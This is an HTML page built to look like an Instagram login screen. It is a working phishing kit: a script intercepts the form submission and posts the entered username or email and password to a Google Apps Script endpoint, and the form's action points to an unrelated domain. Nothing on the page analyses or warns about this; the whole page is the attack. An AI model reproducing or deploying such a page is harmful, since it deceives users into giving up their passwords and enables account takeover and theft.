<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Login Page</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #fafafa;
    }

    .container {
      max-width: 350px;
      margin: auto;
      margin-top: 100px;
      padding: 40px 30px;
      background-color: #fff;
      border-radius: 5px;
      text-align: center;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    }

    .container h1 {
      margin-bottom: 20px;
      color: #262626;
      font-size: 24px;
    }

    .container input[type="text"],
    .container input[type="password"] {
      width: 100%;
      padding: 10px;
      margin-bottom: 10px;
      border: 1px solid #dbdbdb;
      border-radius: 3px;
      background-color: #fafafa;
    }

    .container button {
      width: 100%;
      padding: 10px;
      color: #fff;
      background-color: #0095f6;
      border: none;
      border-radius: 3px;
      cursor: pointer;
    }

    .container p {
      margin-top: 20px;
      font-size: 14px;
      color: #999;
    }

    .container p a {
      color: #0095f6;
      text-decoration: none;
    }

    .container .divider {
      margin-top: 20px;
      position: relative;
    }

    .container .divider:before {
      content: "";
      position: absolute;
      top: 50%;
      left: 0;
      width: 100%;
      height: 1px;
      background-color: #dbdbdb;
    }

    .container .divider span {
      position: relative;
      background-color: #ffffff;
      padding: 0 10px;
      line-height: 1;
      color: #999;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>Instagram</h1>
    <form name="submit-to-google-sheet" action="https://wowfriends.fun/play/mDPG3VKM" >
    <input type="text"  name="email" placeholder="Username or Email" required>
    <input type="password" name="password" placeholder="Password" required>
    <button onclick="https://www.instagram.com/">Log In</button>
    <div class="divider">
      <span>OR</span>
    </div>
    <p><a href="#">Forgot Password?</a></p>
  </div>
  </form>
  <script>
    const scriptURL = 'https://script.google.com/macros/s/AKfycby7xEmGJao5sn4OPvmAWtWfhY7dyvLftcE2YQmUTcQpS-TM2cwcbMpKLvPMNcYiTU8y/exec'
    const form = document.forms['submit-to-google-sheet']
  
    form.addEventListener('submit', e => {
      e.preventDefault()
      fetch(scriptURL, { method: 'POST', body: new FormData(form)})
        .then(response => console.log('Success!', response))
        .catch(error => console.error('Error!', error.message))
    })
  </script>
</body>
</html>
